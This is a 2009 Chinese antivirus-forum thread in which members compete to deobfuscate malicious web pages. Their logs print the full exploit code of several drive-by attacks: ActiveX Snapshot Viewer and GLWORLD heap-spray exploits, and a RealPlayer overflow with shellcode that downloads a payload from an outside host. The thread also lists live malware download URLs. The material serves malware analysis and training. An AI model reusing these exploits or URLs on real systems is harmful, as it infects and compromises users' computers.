查看: 3025|回复: 6
收起左侧

[其它] [解密悬赏][第10期][结束]

[复制链接]
qianwenxiang
发表于 2009-1-8 19:07:00 | 显示全部楼层 |阅读模式
宗旨:
让更多人了解如何解密网马

规则:
1、Hunter不能参加活动
2、必须把所有木马地址全部解出,不完全解密且所发URL之前没有人解出者得到相应步骤加分
3、最好有解密软件日志,如果没有,请发出具体解密过程
4、当第一个人成功完全解密后,将根据难度给予其相应经验,所有URL全部解完之后本帖将锁定
5、如果有违反1~2条规则的情况,本帖随即锁定,之后成功解密的作废!
6、锁定后,会重新修改本次的解密地址,并且开帖!
7、为了体现悬赏帖宗旨,昨日解密成功者再次解出今天网址的只能得到对应网址70%经验



解密地址(替换HXXP为HTTP):

hXXp://www.yhahaz.cn/dfll/a39.htm (完成)
一次解完(包含解密步骤)=10分 (所有iframe均解出exe地址)
分步(即未解完情况)=每步2分 (解出部分iframe或exe地址)

(共计4个步骤/完成 by 250662772 @ 2L ; vistabull @ 3L)

hXXp://1ylpho.cn/ (完成)
一次解完(包含解密步骤)=33
分步(即未解完情况)=每步4
(共计7个步骤/完成 by dearhaoji @ 6L)
*解密时所涉及网页不同,步骤数也可能不同,大概在6~10步之间(因为发现最后一步读取代码时可能随机出来FakeAlert,Zlob等网站的代码)
(期间有YD的HTTPReffer..)

有效性:
> 代码: 读取代码:hXp://1ylpho.cn/
= 长度:140217成功
> 代码: 读取代码:http://www.yhahaz.cn/dfll/a39.htm
= 长度:388成功

注意:这些地址含有恶意软件,可能会危害到您的计算机。请不要直接打开,否则因此造成的一切后果我们概不负责!
参考解密工具:
FreShow(英文)、
Redoce 1.5(中文)、malzilla (英文,但是乃神器也)
http://glacierlk.cn/openlab/jm.htm
参考解密教程:
http://bbs.kafan.cn/viewthread.php?tid=387608
http://bbs.kafan.cn/viewthread.php?tid=220550

http://www.jimmyleo.com/share/FreShow!.rar(推荐!不会用FreShow的可以看看)


(时限=1天)(至2008.01.09 19:00止)
250662772
发表于 2009-1-8 19:18:38 | 显示全部楼层
网页分析结果如下(250662772).
[wide]http://www.yhahaz.cn/dfll/a39.htm
    [frame]http://fhahag.cn/a39/fxx.htm
        [frame]http://fhahag.cn/a39/fx.htm
            [frame]http://fhahag.cn/a39/Ilink.html
            [frame]http://fhahag.cn/a39/flink.html
        [frame]http://fhahag.cn/a39/../a01/ss.htm
        [frame]http://fhahag.cn/a39/../a01/Ms06014.htm
        [frame]http://fhahag.cn/a39/../a01/sina.htm
            [object]http://down.ihahaj.cn/new/a01.css
        [frame]http://fhahag.cn/a39/../a01/no.htm
        [frame]http://fhahag.cn/a39/../a01/bfyy.htm
        [frame]http://fhahag.cn/a39/../a01/GLWORLD.html
            [object]http://down.ihahaj.cn/new/a01.css
        [frame]http://fhahag.cn/a39/../a01/real.htm
            [object]http://down.ihahaj.cn/new/a01.css
        [frame]http://fhahag.cn/a39/../a01/real.html
            [object]http://down.ihahaj.cn/new/a01.css
    [script]http://sj.tongji.cn.yahoo.com/860353/ystat.js

评分

参与人数 1经验 +10 收起 理由
qianwenxiang + 10 加分鼓励

查看全部评分

XMatence
发表于 2009-1-8 19:38:23 | 显示全部楼层

回复 上楼

还有flash

怎么感觉和昨天的一样

要是不死机的话就比你快了


关于:hxxp://www.yhahaz.cn/dfll/a39.htm解密的日志(自动模式 -  4):

AUTO>http://fhahag.cn/a39/fxx.htm

关于:hxxp://fhahag.cn/a39/fxx.htm解密的日志(自动模式 -  14):

AUTO>http://fhahag.cn/a01/sina.htm

<HTML><HEAD>
<SCRIPT type=text/javascript>

function rpppr()
{
return true;
}
window.onerror = rpppr;

var x;
var oootuso;
var tu_bj = new Array();
tu_bj[0] = "c:/Program Files/Outlook Express/wab.exe";
tu_bj[1] = "d:/Program Files/Outlook Express/wab.exe";
tu_bj[2] = "e:/Program Files/Outlook Express/wab.exe";

var p33333s333333spspq = new ActiveXObject("\x73\x6e\x70\x76\x77\x2e\x53\x6e\x61\x70\x73\x68\x6f\x74 \x56\x69\x65\x77\x65\x72\x43\x6f\x6e\x74\x72\x6f\x6c\x2e\x31");

if(p33333s333333spspq="[object]")
{

setTimeout('window.location = "ldap://"',3000);

for (x in tu_bj)
{
oootuso = new ActiveXObject("\x73\x6e\x70\x76\x77\x2e\x53\x6e\x61\x70\x73\x68\x6f\x74 \x56\x69\x65\x77\x65\x72\x43\x6f\x6e\x74\x72\x6f\x6c\x2e\x31")

var tuf1 = 'http://down.ihahaj.cn/new/a01.css';
var tuf2=tu_bj[x];

oootuso.Zoom = 0;

oootuso.ShowNavigationButtons = false;

oootuso.AllowContextMenu = false;

oootuso.SnapshotPath = tuf1;


try
{
oootuso["\x43\x6f\x6d\x70\x72\x65\x73\x73\x65\x64\x50\x61\x74\x68"] = tuf2;
oootuso["\x0050\x0072\x0069\x006e\x0074\x0053\x006e\x0061\x0070\x0073\x0068\x006f\x0074"]();
}catch(e){}

}
}

</SCRIPT>

<META content=VFPEUAGBSX name=SKYPE_FRAMEID>
<META content=VFPEUAGBSX name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY><BR><BR><BR><BR></BODY></HTML>

download http://down.ihahaj.cn/new/a01.css

over

AUTO>http://fhahag.cn/a01/ms06014.htm

无法找到该页


AUTO>http://fhahag.cn/a01/ss.htm

无法链接

AUTO>http://fhahag.cn/a39/fxx.htm

<HTML><HEAD>
<SCRIPT>
document.write("<Iframe width=100 height=0 src=fx.htm></iframe>");
document.write("");
document.write("<Iframe width=100 height=0 src=../a01/ss.htm></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<Iframe width=100 height=0 src=../a01/Ms06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x65\x72\x2e\x44\x4c\x6f\x61\x64\x65\x72\x2e\x31");}
catch(m){};                     
finally{if(m!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a01/sina.htm></iframe>");}}
try{var n;var qxxxxx="dxac";var qxaaxx="aaaac";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("Downloader.DLoader.1");
document.write("<Iframe width=100 height=0 src=../a01/no.htm></iframe>");}}var ddddddddd="dddddddddds";
try{var b;
var ml=new ActiveXObject("MPS.StormPlayer");}
catch(b){};                     
finally{if(b!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a01/bfyy.htm></iframe>");}}
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                     
finally{var dxl="x";if(f!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a01/GLWORLD.html></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32"){var ammc="dsvb";
document.write('<iframe style=display:none src="../a01/real.htm"></iframe>');}
else
document.write('<iframe style=display:none src="../a01/real.html"></iframe>');
}
test();
document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";abc="dfdae";document.write("");var fkav="BS";var fkasaccv="BS";var fkaqfccv="BS";var fkaqjfccv="BS";
</SCRIPT>

<META content=KQXEEPJHVF name=SKYPE_FRAMEID>
<META content=KQXEEPJHVF name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY><IFRAME src="fx.htm" width=100 height=0></IFRAME><IFRAME src="../a01/ss.htm" width=100 height=0></IFRAME><IFRAME src="../a01/Ms06014.htm" width=100 height=0></IFRAME></BODY></HTML>

绕回去了

AUTO>http://fhahag.cn/a39/fx.htm

<HTML><HEAD>
<SCRIPT>
window["\x6f\x6e\x65\x72\x72\x6f\x72"]=function (){
return true;

}
function init(){var kdslsd="asdcbn";
window["\x73\x74\x61\x74\x75\x73"]="";

}window["\x6f\x6e\x6c\x6f\x61\x64"]=init;
if(document.cookie.indexOf("play=")==-1)
{var ppppvvvv="gppp";var expires=new Date();var spnbv="fdsfds";
expires.setTime(expires.getTime()+0*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
  
  document.write("");
  document.write("<IFrame src=Ilink.html width=100 height=0></iframe>");  
  document.write("");  
  
}
else {
  
  document.write("");  
  document.write("<iframe src=flink.html width=100 height=0></iframe>");var xfcx="xqc";
}}
var ksp="nishiyizhizhu";
</SCRIPT>

<META content=PUDOBPTIKJ name=SKYPE_FRAMEID>
<META content=PUDOBPTIKJ name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY><IFRAME src="Ilink.html" width=100 height=0></IFRAME></BODY></HTML>

又绕了两个链接


AUTO>http://fhahag.cn/a39/flink.html

<HTML><HEAD>
<SCRIPT src="swfobject.js" type=text/javascript></SCRIPT>

<META content=UDCJALXUMW name=SKYPE_FRAMEID>
<META content=UDCJALXUMW name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>
<DIV id=flashcontent>111</DIV>
<DIV id=flashversion>222</DIV>
<SCRIPT type=text/javascript>
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
  var fuckavp = "SB";
  var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent");
  var fgfdbdf = "wef";
}else if(version['rev']==64){
  var fuckavp = "SB";
  var hbbf = "wfvvvv";
  var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent");
  var djcshk="dscc";
}else if(version['rev']==47){
  var snjd="dsa";
  var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent")}else if(version['rev']==45){
  var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent")}else if(version['rev']==28){
  var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent")
}else if(version['rev']==16){
  var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent")
}else if(version['rev']>=124){
  if(document.getElementById){
   document.getElementById('flashversion').innerHTML=""
  }
}
}var fkav="BS";
</SCRIPT>
</BODY></HTML>

download ./f115.swf  ./f115.swf  ./f64.swf  ./f45.swf  ./f47.swf   ./f28.swf ./f16.swf

AUTO>http://fhahag.cn/a39/swfobject.js

not virus

AUTO>http://fhahag.cn/a39/+

空连接

AUTO>http://fhahag.cn/a39/ilink.html

<HTML><HEAD>
<SCRIPT src="swfobject.js"></SCRIPT>

<META content=OTPPUISUBX name=SKYPE_FRAMEID>
<META content=OTPPUISUBX name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>
<DIV id=flashcontent>111</DIV>
<DIV id=flashversion>222</DIV>
<SCRIPT type=text/javascript>
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
  var fuckavp = "DZ";
  var fuckaxp = "aa";
  var fuckaqp = "c";
  var so=new SWFObject("./i11"+"5.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent")
}else if(version['rev']==45){
  var fqdscc = "P";
  var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");
  var wevbhpa = "qrffc";
  so.write("flashcontent")
}else if(version['rev']==16){
  var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent")}else if(version['rev']==64){var hgds = "DZ";
  
  so=new SWFObject("\x2e\x2f\x69\x36\x34\x2e\x73\x77\x66","\x6d\x79\x6d\x6f\x76\x69\x65","\x30\x2e\x31","\x30\x2e\x31","\x39","\x23\x30\x30\x30\x30\x30\x30");
  var qwea = "qwecb";
  so.write("flashcontent")
}else if(version['rev']==28){
  var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent");
}else if(version['rev']==47){
  var fuckavpx = "DZ";
  var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent")
}else if(version['rev']>=124){
  if(document.getElementById){
   var fisx="gf";
   document.getElementById('flashversion').innerHTML=""
  }
}
}
var fkav="BS";var fkaav="BS";
</SCRIPT>
</BODY></HTML>

download ./i11 5.swf ./i45.swf ./i16.swf  ./i28.swf  ./i47.swf

AUTO>http://fhahag.cn/a01/real.htm

<HTML><HEAD>
<META content=JNYGNRIKVI name=SKYPE_FRAMEID>
<META content=JNYGNRIKVI name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>/* */
<SCRIPT language=JavaScript>
function WQWWQeqq_RealPlayer_Exp_YingYing_Anhey_ssssssssssssssssssssssssssss()
{
var addr=["%75"+"%06%74"+"%04","%7f"+"%a5"+"%60","%4f"+"%71"+"%a4"+"%60","%63"+"%11"+"%08"+"%60","%63"+"%11"+"%04"+"%60","%79"+"%31"+"%01"+"%60","%79"+"%31"+"%09"+"%60","%51"+"%11"+"%70"+"%63"];
var user=navigator.userAgent["toLowerCase"]();
if(user["indexOf"]("msie 6")==-1&&user.indexOf("msie 7")==-1)
  return;
if(user.indexOf("nt 5.")==-1)
  return;
var WQWWQeqq;
RealplayerObj="IaEaRa"+"PaCatal.I"+"EaRaP"+"Catal.1";
WQWWQeqq = RealplayerObj;
WQWWQeqq_Anhey_Real_Exp_Send = new window["ActiveXObject"](RealplayerObj.replace(/a/g,""));
CuteRealVersion3s = "andhi";
RealVersion = WQWWQeqq_Anhey_Real_Exp_Send["PlayerProperty"]("PRODUCT"+"VERSION");
sdfdgdfg="";
cvbcbb=unescape(addr[0]);
for(i=0;i<32*148;i++)
sdfdgdfg+="S";
if(RealVersion.indexOf("6.0.14.")==-1)
{
  if(navigator.userLanguage.toLowerCase()=="zh-cn")
   ret=unescape(addr[1]);
  else if(navigator.userLanguage.toLowerCase()=="en-us")
   ret=unescape(addr[2]);
  else
   return;
}
else if(RealVersion=="6.0.14.544")
  ret=unescape(addr[3]);
else if(RealVersion=="6.0.14.550")
  ret=unescape(addr[4]);
else if(RealVersion=="6.0.14.552")
  ret=unescape(addr[5]);
else if(RealVersion=="6.0.14.543")
  ret=unescape(addr[6]);
else if(RealVersion=="6.0.14.536")
  ret=unescape(addr[7]);
else
  return;

if(RealVersion.indexOf("6.0.10.")!=-1)
{
  for(i=0;i<4;i++)
  sdfdgdfg=sdfdgdfg+cvbcbb;
  sdfdgdfg=sdfdgdfg+ret;
}
else if(RealVersion.indexOf("6.0.11.")!=-1)
{
  for(i=0;i<6;i++)
  sdfdgdfg=sdfdgdfg+cvbcbb;
  sdfdgdfg=sdfdgdfg+ret;
}
else if(RealVersion.indexOf("6.0.12.")!=-1)
{
  for(i=0;i<9;i++)
  sdfdgdfg=sdfdgdfg+cvbcbb;
  sdfdgdfg=sdfdgdfg+ret;
}
else if(RealVersion.indexOf("6.0.14.")!=-1)
{
  for(i=0;i<10;i++)
  sdfdgdfg=sdfdgdfg+cvbcbb;
  sdfdgdfg=sdfdgdfg+ret;
}

var Kfqq, Qqs="Fucking AntiVirus"; q343434w343f4344gs44g="LLLL\\XXXXXLD"; Kfqq = Qqs;
q12p23c34="";
q12p23c34=q12p23c34+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpf";
q12p23c34=q12p23c34+"KRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzM";
q12p23c34=q12p23c34+"Fv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPr";
q12p23c34=q12p23c34+"f5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqrwSMT";
q12p23c34=q12p23c34+"noeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEle";
q12p23c34=q12p23c34+"oWng2DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPf";
q12p23c34=q12p23c34+"cVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP";
q12p23c34=q12p23c34+"9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoSTPorWPnTn3Y2HSQ58PaaztnasPntorN3UQgFOPaP0P1tn1spsrSOpS0";C2="";
t999999p99999t=sdfdgdfg+q343434w343f4344gs44g+q12p23c34;
temp=0x8000;
while(t999999p99999t.length < temp) t999999p99999t+="lizhen";
var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\TestSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];
WQWWQeqq_Anhey_Real_Exp_Send["import"](arr1[Math.floor(Math["random"]()*6)], t999999p99999t, "123456456", 0, 0);
}
WQWWQeqq_RealPlayer_Exp_YingYing_Anhey_ssssssssssssssssssssssssssss();
var fkcxfdsmdf="cvcb";var ffdf="cvcb";var ffdeadf="cvcb";
</SCRIPT>
</BODY></HTML>

AUTO>http://fhahag.cn/a01/glworld.html

<HTML><HEAD>
<META content=QECDRHVQSU name=SKYPE_FRAMEID>
<META content=QECDRHVQSU name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>
<OBJECT id=PlayBoy2008 classid=clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69></OBJECT>
<SCRIPT>
var tOx=window["unescape"](""+"%u54EB"+"%u758B"+"%u8B3C"+"%u3574"+"%u0378"+"%u56F5"+"%u768B"+"%u0320"+"%u33F5"+"%u49C9"+"%uAD41"+"%uDB33"+"%u0F36"+"%u14BE"+"%u3828"+"%u74F2"+"%uC108"+"%u0DCB"+"%uDA03"+"%uEB40"+"%u3BEF"+"%u75DF"+"%u5EE7"+"%u5E8B"+"%u0324"+"%u66DD"+"%u0C8B"+"%u8B4B"+"%u1C5E"+"%uDD03"+"%u048B"+"%u038B"+"%uC3C5"+"%u7275"+"%u6D6C"+"%u6E6F"+"%u642E"+"%u6C6C"+"%u4300"+"%u5C3A"+"%u2e55"+"%u7865"+"%u0065%uC033"+"%u0364"+"%u3040"+"%u0C78"+"%u408"+"B"+"%u8B0"+"C"+"%u"+"1C7"+"0%u8BA"+"D"+"%u084"+"0"+"%u09E"+"B%u408"+"B"+"%u8D3"+"4%"+"u7C4"+"0"+"%u408"+"B"+"%u953C"+"%u8EBF"+"%u0E4E"+"%uE8EC"+"%uFF84"+"%uFFFF"+"%uEC83"+"%u8304"+"%u242C"+"%uFF3C"+"%u95D0"+"%uBF50"+"%u1A36"+"%u702F"+"%u6FE8"+"%uFFFF"+"%u8BFF"+"%u2454"+"%u8DFC"+"%uBA52"+"%uDB33"+"%u5353"+"%uEB52"+"%u5324"+"%uD0FF"+"%uBF5D"+"%uFE98"+"%u0E8A"+"%u53E8"+"%uFFFF"+"%u83FF"+"%u04EC"+"%u2C83"+"%u6224"+"%uD0FF"+"%u7EBF"+"%uE2D8"+"%uE873"+"%uFF40"+"%uFFFF"+"%uFF52"+"%uE8D0"+"%uFFD7"+"%uFFFF"+"%u74"+"68"+"%u7074%u2f3a%u642f%u776f%u2e6e%u6869%u6861%u6a61%u632e%u2f6e%u656e%u2f77%u3061%u2e31%u7363%u0073");var tOxs="%u9090%u9090";var dadongx="qxcvbnm";var xLp=window["unescape"](tOxs);var xLps=0x40000;while(xLp["length"]<136)xLp+=xLp;xLpVips=xLp["substring"](0,136);xLpVip=xLp["substring"](0,xLp["length"]-136);while(xLpVip["length"]+136<xLps)xLpVip=xLpVip+xLpVip+xLpVips;okVips=new window["Array"]();for(x=0;x<300;x++)okVips[x]=xLpVip+tOx;var JiaoQiu='';while(JiaoQiu["length"]<4057)JiaoQiu=JiaoQiu+"\x0a\x0a\x0a\x0a";JiaoQiu=JiaoQiu+"\x0a";var lcfdfd="vc";JiaoQiu=JiaoQiu+"\x0a";JiaoQiu=JiaoQiu+"\x0a";JiaoQiu=JiaoQiu+"\x0a\x0a\x0a\x0a";JiaoQiu=JiaoQiu+"\x0a\x0a\x0a\x0a";PlayBoy2008["ChatRoom"](JiaoQiu);var kfjld="ds";</SCRIPT>

<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
</BODY></HTML>

AUTO>http://fhahag.cn/a01/bfyy.htm

can not find 404

AUTO>http://fhahag.cn/a01/no.htm

404

AUTO>http://down.ihahaj.cn/new/a01.css  

AUTO>http://sj.tongji.cn.yahoo.com/860353/ystat.js

not


AUTO>http://www.yhahaz.cn/dfll/a39.htm

<HTML><HEAD></HEAD>
<BODY><BR><BR><IFRAME src="http://fhahag.cn/a39/fxx.htm" width=100 height=0></IFRAME><BR><BR>
<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<BR><BR>
<SCRIPT src="http://sj.tongji.cn.yahoo.com/860353/ystat.js" type=text/javascript></SCRIPT>
<NOSCRIPT><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/860353/ystat.gif"/></a></NOSCRIPT></BODY></HTML>

又绕圈子

AUTO>http://tongji.cn.yahoo.com  ●
fx.htm
250662772
发表于 2009-1-8 19:54:19 | 显示全部楼层
原帖由 vistabull 于 2009-1-8 19:38 发表
还有flash

怎么感觉和昨天的一样

要是不死机的话就比你快了


关于:hxxp://www.yhahaz.cn/dfll/a39.htm解密的日志(自动模式 -  4):

AUTO>http://fhahag.cn/a39/fxx.htm

关于:hxxp://fhahag.cn/a39/fx ...

第二个你来吧,我是不解了,网址一堆,不一一试了
qianwenxiang
 楼主| 发表于 2009-1-8 22:57:38 | 显示全部楼层

TO 3楼 vistabull

据说avast会报这个帖子 估计是代码的缘故 刚把你帖子里面;换成;了(上次这么改avast就不鸟了,这次不知道行不行..)
dearhaoji
发表于 2009-1-9 12:42:42 | 显示全部楼层
hxxp://1ylpho.cn/

hxtp://1ylpho.cn/currenthousebills.html

hxxp://1ylpho.cn/menu.js  
里面有http://kogerta.com/in.cgi?3&seoref=    里面有
http://dlsgd3.com/install.php?track_id=10107
下载变成了exe   怀疑是病毒。。
真的是病毒!

File SpywareGuard2008.exe received on 01.09.2009 05:38:49 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED


Result: 10/37 (27.03%)
Loading server information...
Your file is queued in position: ___.
Estimated start time is between ___ and ___ .
Do not close the window until scan is complete.
The scanner that was processing your file is stopped at this moment, we are going to wait a few seconds to try to recover your result.
If you are waiting for more than five minutes you have to resend your file.
Your file is being scanned by VirusTotal in this moment,
results will be shown as they're generated.
Compact Print results  
Your file has expired or does not exists.
Service is stopped in this moments, your file is waiting to be scanned (position: ) for an undefined time.

You can wait for web response (automatic reload) or type your email in the form below and click "request" so the system sends you a notification when the scan is finished.
Email:  
  

Antivirus Version Last Update Result
a-squared 4.0.0.73 2009.01.09 Rootkit.   Win32.TDSS!IK
AhnLab-V3 2009.1.9.0 2009.01.08 -
AntiVir 7.9.0.45 2009.01.08 BDS/Hupigon.Gen
Authentium 5.1.0.4 2009.01.08 -
Avast 4.8.1281.0 2009.01.08 -
AVG 8.0.0.229 2009.01.08 -
BitDefender 7.2 2009.01.09 Trojan.TDss.AW
CAT-QuickHeal 10.00 2009.01.08 Win32.TrojanDropper.Dowque.A.4
ClamAV 0.94.1 2009.01.08 -
Comodo 895 2009.01.08 -
DrWeb 4.44.0.09170 2009.01.08 -
eSafe 7.0.17.0 2009.01.08 Suspicious File
eTrust-Vet 31.6.6299 2009.01.09 -
F-Prot 4.4.4.56 2009.01.08 -
F-Secure 8.0.14470.0 2009.01.09 -
Fortinet 3.117.0.0 2009.01.09 -
GData 19 2009.01.09       Trojan.TDss.AW
Ikarus T3.1.1.45.0 2009.01.09 Rootkit  .Win32.TDSS
K7AntiVirus 7.10.582 2009.01.08 -
Kaspersky 7.0.0.125 2009.01.09 -
McAfee 5489 2009.01.08 -
McAfee+Artemis 5489 2009.01.08 -
Microsoft 1.4205 2009.01.08 Trojan:    Win32/FakeSpyguard
NOD32 3752 2009.01.08 a variant of    Win32/Kryptik.EH
Norman 5.99.02 2009.01.08 -
Panda 9.4.3.3 2009.01.08 -
PCTools 4.4.2.0 2009.01.08 -
Prevx1 V2 2009.01.09 -
Rising 21.11.40.00 2009.01.09 -
SecureWeb-Gateway 6.7.6 2009.01.09     Trojan.Backdoor.Hupigon.Gen
Sophos 4.37.0 2009.01.09 -
Sunbelt 3.2.1831.2 2009.01.09 -
Symantec 10 2009.01.09 -
TheHacker 6.3.1.4.214 2009.01.09 -
TrendMicro 8.700.0.1004 2009.01.09 -
ViRobot 2009.1.9.1551 2009.01.09 -
VirusBuster 4.5.11.0 2009.01.08 -

评分

参与人数 1经验 +33 收起 理由
qianwenxiang + 33 加分鼓励

查看全部评分

qianwenxiang
 楼主| 发表于 2009-1-9 17:14:26 | 显示全部楼层
两地址都解完了~ 悬赏结束~

昨天自己解密的日志: (1ylpho.cn返回了zlob,返回fakealert的见6L)

关于:hxxp://1ylpho.cn/解密的日志(全体输出-  7):

Level 0>http://1ylpho.cn/
Level 1>http://1ylpho.cn/currenthousebills.html
Level 2>http://1ylpho.cn/menu.js
Level 3>http://kogerta.com/in.cgi?3&seoref=http%3A%2F%2F1ylpho.cn%2F&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2F1ylpho.cn%2Fcurrenthousebills.html&para;meter=current house bills
Level 4>http://videopreviewshow.com/l/simple/id/3913123/black/white/current+house+bills/
Level 5>http://myprivatetubes2009.net/2/0/0/64/0/black/
Level 6>[TR.Zlob!]http://myprivatetubes2009.net/cd/64/0/wmpcdcs.exe


Reffer相关
<script>alert("http://kogerta.com/in.cgi?3&seoref="+encodeURIComponent("http://1ylpho.cn/")+ "&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent("http://1ylpho.cn/currenthousebills.html")+"&parameter="+"current house bills");
</script>

---------------------------
Windows Internet Explorer
---------------------------
http://kogerta.com/in.cgi?3
&seoref=http%3A%2F%2F1ylpho.cn%2F&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2F1ylpho.cn%2Fcurrenthousebills.html&parameter=current house bills
---------------------------
确定   
---------------------------



日志由 Redoce1.6第28次修正版于 2009-1-8 18:55:04 生成。


关于:hxxp://www.yhahaz.cn/dfll/a39.htm解密的日志(全体输出-  27):

Level 0>http://www.yhahaz.cn/dfll/a39.htm
Level 1>http://fhahag.cn/a39/fxx.htm
Level 2>http://fhahag.cn/a01/real.html
Level 3>http://down.ihahaj.cn/new/a01.css  ●
Level 2>http://fhahag.cn/a01/real.htm
Level 3>http://down.ihahaj.cn/new/a01.css  ●
Level 2>http://fhahag.cn/a01/glworld.html
Level 3>http://down.ihahaj.cn/new/a01.css  ●
Level 2>http://fhahag.cn/a01/bfyy.htm
Level 2>http://fhahag.cn/a01/no.htm
Level 2>http://fhahag.cn/a01/sina.htm
Level 3>http://down.ihahaj.cn/new/a01.css  ●
Level 2>http://fhahag.cn/a01/ms06014.htm
Level 2>http://fhahag.cn/a01/ss.htm
Level 2>http://fhahag.cn/a39/fx.htm
Level 3>http://fhahag.cn/a39/flink.html
Level 4>http://fhahag.cn/a39/f16.swf  ●
Level 4>http://fhahag.cn/a39/f28.swf  ●
Level 4>http://fhahag.cn/a39/f45.swf  ●
Level 4>http://fhahag.cn/a39/f47.swf  ●
Level 4>http://fhahag.cn/a39/f64.swf  ●
Level 4>http://fhahag.cn/a39/f115.swf  ●
Level 3>http://fhahag.cn/a39/ilink.html
Level 4>http://fhahag.cn/a39/i47.swf  ●
Level 4>http://fhahag.cn/a39/i28.swf  ●
Level 4>http://fhahag.cn/a39/i16.swf  ●
Level 4>http://fhahag.cn/a39/i45.swf  ●

日志由 Redoce1.6第28次修正版于 2009-1-8 19:03:15 生成。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 09:36 , Processed in 0.137893 second(s), 17 queries .

